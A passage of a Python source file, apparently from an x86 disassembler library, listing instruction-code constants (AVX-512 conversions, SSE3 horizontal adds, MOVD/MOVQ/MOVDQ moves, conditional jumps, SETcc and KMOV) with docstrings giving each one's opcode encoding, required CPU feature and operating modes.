``VCVTPD2UDQ ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.0F.W1 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EXTRQ_XMM_XMM: int = 1766
"""
``EXTRQ xmm1, xmm2``
``66 0F 79 /r``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1767
"""
``VCVTPS2UQQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1768
"""
``VCVTPS2UQQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_ZMM_K1Z_YMMM256B32_ER: int = 1769
"""
``VCVTPS2UQQ zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.66.0F.W0 79 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1770
"""
``VCVTPD2UQQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1771
"""
``VCVTPD2UQQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_ZMM_K1Z_ZMMM512B64_ER: int = 1772
"""
``VCVTPD2UQQ zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 79 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTSS2USI_R32_XMMM32_ER: int = 1773
"""
``VCVTSS2USI r32, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSS2USI_R64_XMMM32_ER: int = 1774
"""
``VCVTSS2USI r64, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W1 79 /r``
``AVX512F``
``64-bit``
"""
INSERTQ_XMM_XMM: int = 1775
"""
``INSERTQ xmm1, xmm2``
``F2 0F 79 /r``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTSD2USI_R32_XMMM64_ER: int = 1776
"""
``VCVTSD2USI r32, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSD2USI_R64_XMMM64_ER: int = 1777
"""
``VCVTSD2USI r64, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W1 79 /r``
``AVX512F``
``64-bit``
"""
EVEX_VCVTTPS2QQ_XMM_K1Z_XMMM64B32: int = 1778
"""
``VCVTTPS2QQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2QQ_YMM_K1Z_XMMM128B32: int = 1779
"""
``VCVTTPS2QQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2QQ_ZMM_K1Z_YMMM256B32_SAE: int = 1780
"""
``VCVTTPS2QQ zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.66.0F.W0 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_XMM_K1Z_XMMM128B64: int = 1781
"""
``VCVTTPD2QQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_YMM_K1Z_YMMM256B64: int = 1782
"""
``VCVTTPD2QQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1783
"""
``VCVTTPD2QQ zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_XMM_K1Z_XMMM64B32: int = 1784
"""
``VCVTUDQ2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.F3.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_YMM_K1Z_XMMM128B32: int = 1785
"""
``VCVTUDQ2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.F3.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 1786
"""
``VCVTUDQ2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.F3.0F.W0 7A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_XMM_K1Z_XMMM128B64: int = 1787
"""
``VCVTUQQ2PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F3.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_YMM_K1Z_YMMM256B64: int = 1788
"""
``VCVTUQQ2PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F3.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 1789
"""
``VCVTUQQ2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F3.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_XMM_K1Z_XMMM128B32: int = 1790
"""
``VCVTUDQ2PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F2.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_YMM_K1Z_YMMM256B32: int = 1791
"""
``VCVTUDQ2PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F2.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1792
"""
``VCVTUDQ2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.F2.0F.W0 7A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_XMM_K1Z_XMMM128B64: int = 1793
"""
``VCVTUQQ2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_XMM_K1Z_YMMM256B64: int = 1794
"""
``VCVTUQQ2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1795
"""
``VCVTUQQ2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_XMM_K1Z_XMMM64B32: int = 1796
"""
``VCVTPS2QQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_YMM_K1Z_XMMM128B32: int = 1797
"""
``VCVTPS2QQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_ZMM_K1Z_YMMM256B32_ER: int = 1798
"""
``VCVTPS2QQ zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.66.0F.W0 7B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_XMM_K1Z_XMMM128B64: int = 1799
"""
``VCVTPD2QQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_YMM_K1Z_YMMM256B64: int = 1800
"""
``VCVTPD2QQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_ZMM_K1Z_ZMMM512B64_ER: int = 1801
"""
``VCVTPD2QQ zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 7B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SS_XMM_XMM_RM32_ER: int = 1802
"""
``VCVTUSI2SS xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.0F.W0 7B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SS_XMM_XMM_RM64_ER: int = 1803
"""
``VCVTUSI2SS xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.0F.W1 7B /r``
``AVX512F``
``64-bit``
"""
EVEX_VCVTUSI2SD_XMM_XMM_RM32_ER: int = 1804
"""
``VCVTUSI2SD xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F2.0F.W0 7B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SD_XMM_XMM_RM64_ER: int = 1805
"""
``VCVTUSI2SD xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F2.0F.W1 7B /r``
``AVX512F``
``64-bit``
"""
HADDPD_XMM_XMMM128: int = 1806
"""
``HADDPD xmm1, xmm2/m128``
``66 0F 7C /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHADDPD_XMM_XMM_XMMM128: int = 1807
"""
``VHADDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHADDPD_YMM_YMM_YMMM256: int = 1808
"""
``VHADDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
HADDPS_XMM_XMMM128: int = 1809
"""
``HADDPS xmm1, xmm2/m128``
``F2 0F 7C /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHADDPS_XMM_XMM_XMMM128: int = 1810
"""
``VHADDPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHADDPS_YMM_YMM_YMMM256: int = 1811
"""
``VHADDPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
HSUBPD_XMM_XMMM128: int = 1812
"""
``HSUBPD xmm1, xmm2/m128``
``66 0F 7D /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHSUBPD_XMM_XMM_XMMM128: int = 1813
"""
``VHSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHSUBPD_YMM_YMM_YMMM256: int = 1814
"""
``VHSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
HSUBPS_XMM_XMMM128: int = 1815
"""
``HSUBPS xmm1, xmm2/m128``
``F2 0F 7D /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHSUBPS_XMM_XMM_XMMM128: int = 1816
"""
``VHSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHSUBPS_YMM_YMM_YMMM256: int = 1817
"""
``VHSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
MOVD_RM32_MM: int = 1818
"""
``MOVD r/m32, mm``
``NP 0F 7E /r``
``MMX``
``16/32/64-bit``
"""
MOVQ_RM64_MM: int = 1819
"""
``MOVQ r/m64, mm``
``NP o64 0F 7E /r``
``MMX``
``64-bit``
"""
MOVD_RM32_XMM: int = 1820
"""
``MOVD r/m32, xmm``
``66 0F 7E /r``
``SSE2``
``16/32/64-bit``
"""
MOVQ_RM64_XMM: int = 1821
"""
``MOVQ r/m64, xmm``
``66 o64 0F 7E /r``
``SSE2``
``64-bit``
"""
VEX_VMOVD_RM32_XMM: int = 1822
"""
``VMOVD r/m32, xmm1``
``VEX.128.66.0F.W0 7E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVQ_RM64_XMM: int = 1823
"""
``VMOVQ r/m64, xmm1``
``VEX.128.66.0F.W1 7E /r``
``AVX``
``64-bit``
"""
EVEX_VMOVD_RM32_XMM: int = 1824
"""
``VMOVD r/m32, xmm1``
``EVEX.128.66.0F.W0 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVQ_RM64_XMM: int = 1825
"""
``VMOVQ r/m64, xmm1``
``EVEX.128.66.0F.W1 7E /r``
``AVX512F``
``64-bit``
"""
MOVQ_XMM_XMMM64: int = 1826
"""
``MOVQ xmm1, xmm2/m64``
``F3 0F 7E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVQ_XMM_XMMM64: int = 1827
"""
``VMOVQ xmm1, xmm2/m64``
``VEX.128.F3.0F.WIG 7E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMM_XMMM64: int = 1828
"""
``VMOVQ xmm1, xmm2/m64``
``EVEX.128.F3.0F.W1 7E /r``
``AVX512F``
``16/32/64-bit``
"""
MOVQ_MMM64_MM: int = 1829
"""
``MOVQ mm/m64, mm``
``NP 0F 7F /r``
``MMX``
``16/32/64-bit``
"""
MOVDQA_XMMM128_XMM: int = 1830
"""
``MOVDQA xmm2/m128, xmm1``
``66 0F 7F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQA_XMMM128_XMM: int = 1831
"""
``VMOVDQA xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQA_YMMM256_YMM: int = 1832
"""
``VMOVDQA ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_XMMM128_K1Z_XMM: int = 1833
"""
``VMOVDQA32 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_YMMM256_K1Z_YMM: int = 1834
"""
``VMOVDQA32 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_ZMMM512_K1Z_ZMM: int = 1835
"""
``VMOVDQA32 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_XMMM128_K1Z_XMM: int = 1836
"""
``VMOVDQA64 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_YMMM256_K1Z_YMM: int = 1837
"""
``VMOVDQA64 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_ZMMM512_K1Z_ZMM: int = 1838
"""
``VMOVDQA64 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDQU_XMMM128_XMM: int = 1839
"""
``MOVDQU xmm2/m128, xmm1``
``F3 0F 7F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQU_XMMM128_XMM: int = 1840
"""
``VMOVDQU xmm2/m128, xmm1``
``VEX.128.F3.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQU_YMMM256_YMM: int = 1841
"""
``VMOVDQU ymm2/m256, ymm1``
``VEX.256.F3.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_XMMM128_K1Z_XMM: int = 1842
"""
``VMOVDQU32 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F3.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_YMMM256_K1Z_YMM: int = 1843
"""
``VMOVDQU32 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F3.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_ZMMM512_K1Z_ZMM: int = 1844
"""
``VMOVDQU32 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F3.0F.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_XMMM128_K1Z_XMM: int = 1845
"""
``VMOVDQU64 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F3.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_YMMM256_K1Z_YMM: int = 1846
"""
``VMOVDQU64 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F3.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_ZMMM512_K1Z_ZMM: int = 1847
"""
``VMOVDQU64 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F3.0F.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_XMMM128_K1Z_XMM: int = 1848
"""
``VMOVDQU8 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F2.0F.W0 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_YMMM256_K1Z_YMM: int = 1849
"""
``VMOVDQU8 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F2.0F.W0 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_ZMMM512_K1Z_ZMM: int = 1850
"""
``VMOVDQU8 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F2.0F.W0 7F /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_XMMM128_K1Z_XMM: int = 1851
"""
``VMOVDQU16 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F2.0F.W1 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_YMMM256_K1Z_YMM: int = 1852
"""
``VMOVDQU16 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F2.0F.W1 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_ZMMM512_K1Z_ZMM: int = 1853
"""
``VMOVDQU16 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F2.0F.W1 7F /r``
``AVX512BW``
``16/32/64-bit``
"""
JO_REL16: int = 1854
"""
``JO rel16``
``o16 0F 80 cw``
``386+``
``16/32/64-bit``
"""
JO_REL32_32: int = 1855
"""
``JO rel32``
``o32 0F 80 cd``
``386+``
``16/32-bit``
"""
JO_REL32_64: int = 1856
"""
``JO rel32``
``o64 0F 80 cd``
``X64``
``64-bit``
"""
JNO_REL16: int = 1857
"""
``JNO rel16``
``o16 0F 81 cw``
``386+``
``16/32/64-bit``
"""
JNO_REL32_32: int = 1858
"""
``JNO rel32``
``o32 0F 81 cd``
``386+``
``16/32-bit``
"""
JNO_REL32_64: int = 1859
"""
``JNO rel32``
``o64 0F 81 cd``
``X64``
``64-bit``
"""
JB_REL16: int = 1860
"""
``JB rel16``
``o16 0F 82 cw``
``386+``
``16/32/64-bit``
"""
JB_REL32_32: int = 1861
"""
``JB rel32``
``o32 0F 82 cd``
``386+``
``16/32-bit``
"""
JB_REL32_64: int = 1862
"""
``JB rel32``
``o64 0F 82 cd``
``X64``
``64-bit``
"""
JAE_REL16: int = 1863
"""
``JAE rel16``
``o16 0F 83 cw``
``386+``
``16/32/64-bit``
"""
JAE_REL32_32: int = 1864
"""
``JAE rel32``
``o32 0F 83 cd``
``386+``
``16/32-bit``
"""
JAE_REL32_64: int = 1865
"""
``JAE rel32``
``o64 0F 83 cd``
``X64``
``64-bit``
"""
JE_REL16: int = 1866
"""
``JE rel16``
``o16 0F 84 cw``
``386+``
``16/32/64-bit``
"""
JE_REL32_32: int = 1867
"""
``JE rel32``
``o32 0F 84 cd``
``386+``
``16/32-bit``
"""
JE_REL32_64: int = 1868
"""
``JE rel32``
``o64 0F 84 cd``
``X64``
``64-bit``
"""
JNE_REL16: int = 1869
"""
``JNE rel16``
``o16 0F 85 cw``
``386+``
``16/32/64-bit``
"""
JNE_REL32_32: int = 1870
"""
``JNE rel32``
``o32 0F 85 cd``
``386+``
``16/32-bit``
"""
JNE_REL32_64: int = 1871
"""
``JNE rel32``
``o64 0F 85 cd``
``X64``
``64-bit``
"""
JBE_REL16: int = 1872
"""
``JBE rel16``
``o16 0F 86 cw``
``386+``
``16/32/64-bit``
"""
JBE_REL32_32: int = 1873
"""
``JBE rel32``
``o32 0F 86 cd``
``386+``
``16/32-bit``
"""
JBE_REL32_64: int = 1874
"""
``JBE rel32``
``o64 0F 86 cd``
``X64``
``64-bit``
"""
JA_REL16: int = 1875
"""
``JA rel16``
``o16 0F 87 cw``
``386+``
``16/32/64-bit``
"""
JA_REL32_32: int = 1876
"""
``JA rel32``
``o32 0F 87 cd``
``386+``
``16/32-bit``
"""
JA_REL32_64: int = 1877
"""
``JA rel32``
``o64 0F 87 cd``
``X64``
``64-bit``
"""
JS_REL16: int = 1878
"""
``JS rel16``
``o16 0F 88 cw``
``386+``
``16/32/64-bit``
"""
JS_REL32_32: int = 1879
"""
``JS rel32``
``o32 0F 88 cd``
``386+``
``16/32-bit``
"""
JS_REL32_64: int = 1880
"""
``JS rel32``
``o64 0F 88 cd``
``X64``
``64-bit``
"""
JNS_REL16: int = 1881
"""
``JNS rel16``
``o16 0F 89 cw``
``386+``
``16/32/64-bit``
"""
JNS_REL32_32: int = 1882
"""
``JNS rel32``
``o32 0F 89 cd``
``386+``
``16/32-bit``
"""
JNS_REL32_64: int = 1883
"""
``JNS rel32``
``o64 0F 89 cd``
``X64``
``64-bit``
"""
JP_REL16: int = 1884
"""
``JP rel16``
``o16 0F 8A cw``
``386+``
``16/32/64-bit``
"""
JP_REL32_32: int = 1885
"""
``JP rel32``
``o32 0F 8A cd``
``386+``
``16/32-bit``
"""
JP_REL32_64: int = 1886
"""
``JP rel32``
``o64 0F 8A cd``
``X64``
``64-bit``
"""
JNP_REL16: int = 1887
"""
``JNP rel16``
``o16 0F 8B cw``
``386+``
``16/32/64-bit``
"""
JNP_REL32_32: int = 1888
"""
``JNP rel32``
``o32 0F 8B cd``
``386+``
``16/32-bit``
"""
JNP_REL32_64: int = 1889
"""
``JNP rel32``
``o64 0F 8B cd``
``X64``
``64-bit``
"""
JL_REL16: int = 1890
"""
``JL rel16``
``o16 0F 8C cw``
``386+``
``16/32/64-bit``
"""
JL_REL32_32: int = 1891
"""
``JL rel32``
``o32 0F 8C cd``
``386+``
``16/32-bit``
"""
JL_REL32_64: int = 1892
"""
``JL rel32``
``o64 0F 8C cd``
``X64``
``64-bit``
"""
JGE_REL16: int = 1893
"""
``JGE rel16``
``o16 0F 8D cw``
``386+``
``16/32/64-bit``
"""
JGE_REL32_32: int = 1894
"""
``JGE rel32``
``o32 0F 8D cd``
``386+``
``16/32-bit``
"""
JGE_REL32_64: int = 1895
"""
``JGE rel32``
``o64 0F 8D cd``
``X64``
``64-bit``
"""
JLE_REL16: int = 1896
"""
``JLE rel16``
``o16 0F 8E cw``
``386+``
``16/32/64-bit``
"""
JLE_REL32_32: int = 1897
"""
``JLE rel32``
``o32 0F 8E cd``
``386+``
``16/32-bit``
"""
JLE_REL32_64: int = 1898
"""
``JLE rel32``
``o64 0F 8E cd``
``X64``
``64-bit``
"""
JG_REL16: int = 1899
"""
``JG rel16``
``o16 0F 8F cw``
``386+``
``16/32/64-bit``
"""
JG_REL32_32: int = 1900
"""
``JG rel32``
``o32 0F 8F cd``
``386+``
``16/32-bit``
"""
JG_REL32_64: int = 1901
"""
``JG rel32``
``o64 0F 8F cd``
``X64``
``64-bit``
"""
SETO_RM8: int = 1902
"""
``SETO r/m8``
``0F 90 /r``
``386+``
``16/32/64-bit``
"""
SETNO_RM8: int = 1903
"""
``SETNO r/m8``
``0F 91 /r``
``386+``
``16/32/64-bit``
"""
SETB_RM8: int = 1904
"""
``SETB r/m8``
``0F 92 /r``
``386+``
``16/32/64-bit``
"""
SETAE_RM8: int = 1905
"""
``SETAE r/m8``
``0F 93 /r``
``386+``
``16/32/64-bit``
"""
SETE_RM8: int = 1906
"""
``SETE r/m8``
``0F 94 /r``
``386+``
``16/32/64-bit``
"""
SETNE_RM8: int = 1907
"""
``SETNE r/m8``
``0F 95 /r``
``386+``
``16/32/64-bit``
"""
SETBE_RM8: int = 1908
"""
``SETBE r/m8``
``0F 96 /r``
``386+``
``16/32/64-bit``
"""
SETA_RM8: int = 1909
"""
``SETA r/m8``
``0F 97 /r``
``386+``
``16/32/64-bit``
"""
SETS_RM8: int = 1910
"""
``SETS r/m8``
``0F 98 /r``
``386+``
``16/32/64-bit``
"""
SETNS_RM8: int = 1911
"""
``SETNS r/m8``
``0F 99 /r``
``386+``
``16/32/64-bit``
"""
SETP_RM8: int = 1912
"""
``SETP r/m8``
``0F 9A /r``
``386+``
``16/32/64-bit``
"""
SETNP_RM8: int = 1913
"""
``SETNP r/m8``
``0F 9B /r``
``386+``
``16/32/64-bit``
"""
SETL_RM8: int = 1914
"""
``SETL r/m8``
``0F 9C /r``
``386+``
``16/32/64-bit``
"""
SETGE_RM8: int = 1915
"""
``SETGE r/m8``
``0F 9D /r``
``386+``
``16/32/64-bit``
"""
SETLE_RM8: int = 1916
"""
``SETLE r/m8``
``0F 9E /r``
``386+``
``16/32/64-bit``
"""
SETG_RM8: int = 1917
"""
``SETG r/m8``
``0F 9F /r``
``386+``
``16/32/64-bit``
"""
VEX_KMOVW_KR_KM16: int = 1918
"""
``KMOVW k1, k2/m16``
``VEX.L0.0F.W0 90 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVQ_KR_KM64: int = 1919
"""
``KMOVQ k1, k2/m64``
``VEX.L0.0F.W1 90 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVB_KR_KM8: int = 1920
"""
``KMOVB k1, k2/m8``
``VEX.L0.66.0F.W0 90 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_KR_KM32: int = 1921
"""
``KMOVD k1, k2/m32``
``VEX.L0.66.0F.W1 90 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVW_M16_KR: int = 1922
"""
``KMOVW m16, k1``
``VEX.L0.0F.W0 91 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVQ_M64_KR: int = 1923
"""
``KMOVQ m64, k1``
``VEX.L0.0F.W1 91 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVB_M8_KR: int = 1924
"""
``KMOVB m8, k1``
``VEX.L0.66.0F.W0 91 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_M32_KR: int = 1925
"""
``KMOVD m32, k1``
``VEX.L0.66.0F.W1 91 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVW_KR_R32: int = 1926
"""
``KMOVW k1, r32``
``VEX.L0.0F.W0 92 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVB_KR_R32: int = 1927
"""
``KMOVB k1, r32``
``VEX.L0.66.0F.W0 92 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_KR_R32: int = 1928
"""
``KMOVD k1, r32``
``VEX.L0.F2.0F.W0 92 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVQ_KR_R64: int = 1929
"""
``KMOVQ k1, r64``
``VEX.L0.F2.0F.W1 92 /r``
``AVX512BW``
``64-bit``
"""
VEX_KMOVW_R32_KR: int = 1930
"""
``KMOVW r32, k1``
``VEX.L0.0F.W0 93 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVB_R32_KR: int = 1931
"""
``KMOVB r32, k1``
``VEX.L0.66.0F.W0 93 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_R32_KR: int = 1932
"""
``KMOVD r32, k1``
``VEX.L0.F2.0F.W0 93 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVQ_R64_KR: int = 1933
"""
``KMOVQ r64, k1``
``VEX.L0.F2.0F.W1 93 /r``
``AVX512BW``
``64-bit``
"""
VEX_KORTESTW_KR_KR: int = 1934
"""
